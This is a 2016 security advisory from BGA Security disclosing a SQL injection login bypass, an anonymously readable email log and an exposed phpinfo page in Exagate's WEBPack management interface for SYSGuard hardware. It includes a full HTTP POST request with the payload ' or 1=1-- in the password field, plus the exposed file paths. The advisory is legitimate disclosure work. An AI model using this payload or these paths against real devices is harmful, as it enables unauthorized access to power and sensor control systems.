Document Title:
================
Exagate WEBpack Management System Multiple Vulnerabilities
 
Author:
========
Halil Dalabasmaz
 
Release Date:
==============
07 OCT 2016
 
Product & Service Introduction:
================================
WEBPack is the individual built-in user-friendly and skilled web
interface allowing web-based access to the main units of the SYSGuard
and POWERGuard series. The advanced software enables the users to
design their customized dashboard smoothly for a detailed monitoring
and management of all the power outlet sockets & sensor and volt free
contact ports, as well as relay outputs. User definition and authorization,
remote access and update, detailed reporting and archiving are among the
many features.
  
Vendor Homepage:
=================
http://www.exagate.com/
 
Vulnerability Information:
===========================
Exagate company uses WEBPack Management System software on the hardware.
The software is web-based and it is provide control on the hardware. There are
multiple vulnerabilities on that software.
 
Vulnerability #1: SQL Injection
================================
 
There is no any filtering or validation mechanisim on "login.php". "username"
and "password" inputs are vulnerable to SQL Injection attacks. Sample POST
request is given below.
 
POST /login.php HTTP/1.1
Host: <TARGET HOST>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
 
username=root&password=' or 1=1--
 
Vulnerability #2: Unauthorized Access To Sensetive Information
===============================================================
 
The software is capable of sending e-mail to system admins. But there is no
any authorization mechanism to access e-mail logs. The e-mail logs can accessable
anonymously from "http://<TARGET HOST>/emaillog.txt".
 
Vulnerability #3: Unremoved Configuration Files
================================================
 
The software contains the PHP Info file on the following URL.
 
http://<TARGET HOST>/api/phpinfo.php
 
Vulnerability Disclosure Timeline:
==================================
03 OCT 2016 -   Attempted to contact vendor after discovery of vulnerabilities
06 OCT 2016 -   No response from vendor and re-attempted to contact vendor
07 OCT 2016 -   No response from vendor
07 OCT 2016 -   Public Disclosure
  
Discovery Status:
==================
Published
  
Affected Product(s):
=====================
Exagate SYSGuard 3001 (Most probably all Exagate hardwares affected that vulnerabilities)
 
Tested On:
===========
Exagate SYSGuard 3001
 
Disclaimer & Information:
==========================
The information provided in this advisory is provided as it is without 
any warranty. BGA disclaims all  warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular
purpose. BGA or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business profits or
special damages.
   
Domain:     www.bgasecurity.com
Social:     twitter.com/bgasecurity
Contact:    advisory@bga.com.tr
 
Copyright A(c) 2016 | BGA Security LLC